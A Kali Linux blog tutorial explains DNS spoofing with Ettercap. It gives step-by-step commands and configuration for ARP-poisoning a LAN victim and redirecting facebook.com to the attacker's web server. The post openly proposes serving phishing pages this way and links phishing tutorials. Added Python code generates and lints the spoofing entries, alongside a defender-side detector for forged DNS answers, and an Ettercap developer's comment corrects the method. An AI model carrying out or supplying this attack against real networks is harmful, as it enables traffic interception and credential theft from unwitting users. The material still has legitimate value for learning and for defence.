Ettercap — DNS Spoofing on Kali Linux

Today we are going to learn DNS spoofing on our Kali Linux system with the help of Ettercap, and how to use Ettercap on Kali Linux. Before learning DNS spoofing we need a clear idea of DNS. DNS stands for Domain Name System. A DNS server translates a human-readable domain name (such as google.com or nytimes.com) into the numerical IP address that is used to route communications between nodes.

[Screenshot: ettercap]

As we know, every system on a network has a unique IP address, but it is very difficult for a human to remember the IP addresses of many websites, so a domain name is attached to the IP address. To reduce the effort and improve performance, a DNS resolver saves translation results for a limited time; this store is called the cache.

This means that if it receives another request for the same translation, it can reply without asking any other server until the cache entry expires.

DNS spoofing is a crucial part of penetration testing. In this method the attacker answers a DNS query with an incorrect IP address, so the victim's traffic for that domain is diverted to the attacker's computer or to any other system of the attacker's choosing.

In the setup used here, the attacker first uses ARP poisoning to place themselves between the victim and the gateway, and then forges DNS replies to the victim's queries. From the victim's point of view the attack is hard to notice, because the browser still shows the expected domain name; what gives it away is the answer itself, for example a public domain resolving to a LAN address, or an answer that differs from what a trusted resolver returns for the same name.
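As an added example (not part of the original article), the two checks just mentioned in code. It is a defender-side script that runs over a constructed list of observed DNS answers and flags, first, A/AAAA answers for non-internal names that point at non-global address space (which is exactly what an etter.dns entry pointing facebook.com at a LAN host produces), and second, answers that disagree with a trusted resolver. The addresses, the suffix list and the trusted answers are assumptions made up for the example.

```python
"""
Defender-side checks for the kind of forged DNS answers a dns_spoof run produces.

Two independent signals:
  1. a public domain name resolving to a private, link-local or otherwise
     non-global address (what etter.dns does when it points facebook.com
     at the attacker's LAN address), and
  2. an answer that disagrees with what a trusted resolver returns for the
     same name (for example one reached over DNS-over-HTTPS, which an
     on-path attacker cannot forge in transit).
"""
import ipaddress

# Constructed sample of answers seen on the LAN, as (name, record type, answer).
# All addresses are assumptions made up for this example.
OBSERVED = [
    ("facebook.com", "A", "192.168.1.10"),        # forged: public name -> LAN address
    ("www.facebook.com", "A", "192.168.1.10"),
    ("facebook.com", "AAAA", "fd00::10"),         # forged: unique-local IPv6
    ("example.com", "A", "93.184.216.34"),        # global address, nothing to flag
    ("printer.corp.local", "A", "192.168.1.50"),  # internal name, private answer is expected
]

# Constructed answers from a trusted resolver for the same names. 203.0.113.5 is a
# documentation address standing in for the real facebook.com address.
TRUSTED = {
    ("facebook.com", "A"): {"203.0.113.5"},
    ("example.com", "A"): {"93.184.216.34"},
}

# Assumed list of suffixes whose names are expected to live in private space.
INTERNAL_SUFFIXES = (".local", ".lan", ".internal")


def is_internal_name(name, suffixes=INTERNAL_SUFFIXES):
    """True for names under one of the internal suffixes."""
    return name.lower().rstrip(".").endswith(suffixes)


def non_global_answers(records, suffixes=INTERNAL_SUFFIXES):
    """Signal 1: A/AAAA answers that are not globally routable for non-internal names."""
    flagged = []
    for name, rtype, answer in records:
        if rtype not in ("A", "AAAA") or is_internal_name(name, suffixes):
            continue
        if not ipaddress.ip_address(answer).is_global:
            flagged.append((name, rtype, answer))
    return flagged


def disagreeing_answers(records, trusted):
    """Signal 2: answers that differ from the trusted resolver's answer set."""
    return [
        (name, rtype, answer)
        for name, rtype, answer in records
        if (name, rtype) in trusted and answer not in trusted[(name, rtype)]
    ]


if __name__ == "__main__":
    for rec in non_global_answers(OBSERVED):
        print("non-global answer for public name:", rec)
    for rec in disagreeing_answers(OBSERVED, TRUSTED):
        print("answer disagrees with trusted resolver:", rec)
```

The first signal needs no network access and catches the redirect-to-localhost case in this article by itself; the second only works if the trusted answers come from a path the on-path attacker cannot spoof.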

For this tutorial we use Ettercap to spoof DNS. Ettercap is a very popular and easy-to-use tool for ARP poisoning and DNS spoofing.

How do we install Ettercap on Kali Linux? We don't need to: Ettercap comes pre-installed with Kali Linux. Before opening it we do some configuration. We open a terminal window and edit the etter.conf file in any text editor. The file is located at /etc/ettercap/etter.conf. We use leafpad here (any editor works), and the command is:

leafpad /etc/ettercap/etter.conf

[Screenshot: etter.conf]

Now we scroll down to the Linux section.

[Screenshot: etter.conf linux section]

The Linux section contains two commented-out redir_command_on and redir_command_off lines for iptables. The original version of this article told readers to remove the # from those lines, but as an Ettercap developer points out in the comments at the end of this page, that is NOT needed for DNS spoofing: those lines only matter when Ettercap should redirect SSL traffic to itself, and with them enabled it tries to intercept every SSL handshake with its own self-signed certificate, which breaks the victim's HTTPS sessions in ways that are hard to debug. Leave them commented out for this tutorial.

[Screenshot: etter.conf linux iptables section]

Then we save and close the file. Next we start our Apache web server with the following command:

service apache2 start

Then we find our local IP address with the following command (on newer Kali images ifconfig may not be installed; the ip command shows the same information):

ifconfig

[Screenshot: ifconfig]

When we open our localhost in a browser, we see the default homepage of the Apache web server. We can put anything on our localhost, such as a phishing page or any other malicious web page. Now we map the facebook.com domain to our localhost. This means that if someone on our local network tries to open facebook.com, they get our localhost page instead of Facebook.

Now we need to configure another Ettercap file called etter.dns, using the following command:

leafpad /etc/ettercap/etter.dns

[Screenshot: etter.dns]

Then we scroll down to the sample redirect block and set our target.

[Screenshot: etter.dns target]

In that sample block we remove the example hostname highlighted in the screenshot and put in the domain we want to redirect, in our case facebook.com, and we change the next line to the wildcard form *.facebook.com so that sub-domains such as www.facebook.com are covered too. Then we replace the IPs on those lines with our local IP, and delete the third sample line. Because a modern resolver sends an AAAA (IPv6) query alongside every A query, we also add matching AAAA lines for the same two names pointing at our host's IPv6 address; without them the resolver receives a forged A answer next to an unforged AAAA answer, which confuses a number of resolvers (see the Ettercap developer's comment at the end of this page). The configuration is shown in the following screenshot:

[Screenshot: etter.dns setting]

Then we save the file and close it.
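As an added example (not Ettercap's own code or the article's), a small Python helper that generates the etter.dns lines for a domain and lints an etter.dns block for the IPv6 problem described above: it parses the `name type value [ttl]` format, checks that A and AAAA values are addresses of the right family, and lists every name that is spoofed for A but not for AAAA. The sample block, the addresses 192.168.1.10 and fd00::10 (standing in for the attacker host's IPv4 and IPv6 addresses) and the column layout are assumptions made for the example.

```python
"""
Generate and lint the etter.dns entries for an Ettercap dns_spoof run.

etter.dns entry format (one record per line, '#' starts a comment):
    <name> <record type> <value> [ttl]
<name> may be a wildcard such as *.facebook.com.
"""
import ipaddress
import re

# Constructed sample of the block we add to /etc/ettercap/etter.dns.
# 192.168.1.10 and fd00::10 are assumed to be the attacker host's addresses.
SAMPLE_ETTER_DNS = """\
# redirect facebook.com and its sub-domains to our own web server
facebook.com      A     192.168.1.10
*.facebook.com    A     192.168.1.10
facebook.com      AAAA  fd00::10
*.facebook.com    AAAA  fd00::10
"""

ENTRY_RE = re.compile(r"^(\S+)\s+([A-Z]+)\s+(\S+)(?:\s+(\d+))?$")


def parse_etter_dns(text):
    """Parse etter.dns text into a list of (name, rtype, value, ttl) tuples.

    Raises ValueError on a malformed line or on an A/AAAA value that is not
    an address of the matching family.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: cannot parse {raw!r}")
        name, rtype, value, ttl = m.groups()
        try:
            if rtype == "A":
                ipaddress.IPv4Address(value)
            elif rtype == "AAAA":
                ipaddress.IPv6Address(value)
        except ValueError as exc:
            raise ValueError(f"line {lineno}: {rtype} value {value!r} is not valid") from exc
        entries.append((name, rtype, value, int(ttl) if ttl else None))
    return entries


def names_missing_aaaa(entries):
    """Names that have an A entry but no AAAA entry.

    A resolver sends an AAAA query alongside the A query, so a name that is
    spoofed only for A gets one forged and one genuine answer; this lint
    catches that before the plugin is started.
    """
    with_a = {name for name, rtype, _, _ in entries if rtype == "A"}
    with_aaaa = {name for name, rtype, _, _ in entries if rtype == "AAAA"}
    return sorted(with_a - with_aaaa)


def spoof_lines(name, ipv4, ipv6=None):
    """Build the etter.dns lines that redirect `name` and *.name to our host."""
    lines = [f"{n:<18}{'A':<6}{ipv4}" for n in (name, "*." + name)]
    if ipv6:
        lines += [f"{n:<18}{'AAAA':<6}{ipv6}" for n in (name, "*." + name)]
    return lines


if __name__ == "__main__":
    entries = parse_etter_dns(SAMPLE_ETTER_DNS)
    print("parsed entries:", entries)
    print("names without AAAA:", names_missing_aaaa(entries))
    print("\n".join(spoof_lines("facebook.com", "192.168.1.10", "fd00::10")))
```

Run it before starting the plugin: an empty result from names_missing_aaaa means every spoofed name gets a forged answer for both query types, and spoof_lines gives you the four lines to paste into etter.dns.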
Now we open Ettercap with the following command:

ettercap -G

This opens Ettercap's graphical user interface (GUI).

[Screenshot: ettercap GUI]

Then we click on Sniff and then Unified Sniffing. Here we need to choose our network interface; Ettercap then starts unified sniffing.
Now we choose our target. Before choosing the target we need to stop unified sniffing: we click on the Start menu and then on Stop Sniffing.

Then we go to the Targets menu and click on Current Targets. We can see in the following screenshot that we don't have any target yet:

[Screenshot: ettercap targets]

We need to scan for hosts, so we click on the Hosts menu and then on Scan for hosts.

Then we open the Host List from the Hosts menu, where we should see the hosts on our network. We add our default gateway as Target 1 and the victim as Target 2. In this walkthrough the Kali machine itself plays the victim, so we add our own IP as Target 2.

Then we go to the MITM (Man In The Middle) menu, click on ARP poisoning, tick "Sniff remote connections" and click OK. Now ARP poisoning is set up, and the victim's traffic to and from the gateway passes through our machine.

Next we go to the Plugins menu, then Manage the plugins, and activate the dns_spoof plugin by double-clicking on it. This is the plugin that reads etter.dns and answers matching queries with the addresses we configured.

[Screenshot: dns spoofing]

Now we are all set. We go to the Start menu and click on Start Sniffing. (The same attack can be run without the GUI: Ettercap's text interface, -T, takes the ARP MITM mode via -M arp:remote, the dns_spoof plugin via -P and the two targets on the command line.)

Now we open our browser and try to open facebook.com; the request is redirected to our localhost and the page we host there loads instead. Note that this works cleanly only for plain HTTP: facebook.com, like most major sites, is served over HTTPS with HSTS, so a modern browser refuses to load the page from our server because we cannot present a valid certificate for that name. Any page we host on localhost can be served this way, and if it is a phishing page the attack becomes very dangerous. To learn how to host malicious web pages on localhost, try these tutorials:

Weeman Phishing Over Wan

ShellPhish Easy Phishing

KP, AKA Koushik Pal, is a security researcher and specialist focused on education about Linux for cybersecurity and URL-masking vulnerabilities. Creator of MaskPhish, a well-known open-source bash-based URL-masking tool. Linux enthusiast, active speaker, trainer, and advocate for secure web practices.

6 comments

Unknown

My sniffing is not working, what happened brother? Please tell me.

Kali Linux

Give me the details of the error, otherwise I can't help you. Are you using Kali in a virtual machine?

Anonymous

No error message in the terminal; no error in Ettercap. Got the below message in Ettercap, still not working. My IP was on the left and the target IP on the right.

Kali Linux

Did you update Ettercap?

Ettercap

Hi,
I'm one of the Ettercap developers. I was notified about this blog by one of the Ettercap users.

It appears that this blog is providing imprecise information on how to use Ettercap to run a DNS spoof attack.

The first main issue is that uncommenting the redir_command_on and redir_command_off commands is NOT necessary to run this attack. It can even lead to unwanted issues when not handled carefully, since Ettercap then tries to intercept the SSL handshake of every SSL-enabled protocol by default with its self-signed certificate.

The second issue your blog entry introduces is that it ignores the fact of a world with IPv6 in parallel to IPv4. So while you're only spoofing responses to type A queries, the DNS resolver will in parallel fire AAAA queries, which your example etter.dns ignores. This leads to the result that the DNS resolver gets NXDOMAIN responses and A responses, which seems to confuse a number of DNS resolvers. Either the domain is there but doesn't have records for this record type, or it is not there.

Please correct your blog entry in order to not spread false information.
Thanks
Alexander Koeppe

Kali Linux

Hello Alexander, we are glad that you read our article, and we are very sorry for our content. To clear things up, we can say that we don't share false articles and always try to give genuine knowledge to our readers. But sometimes mistakes happen. We will correct this article as per your recommendation. Thank you very much for giving us your time and making things beautiful.
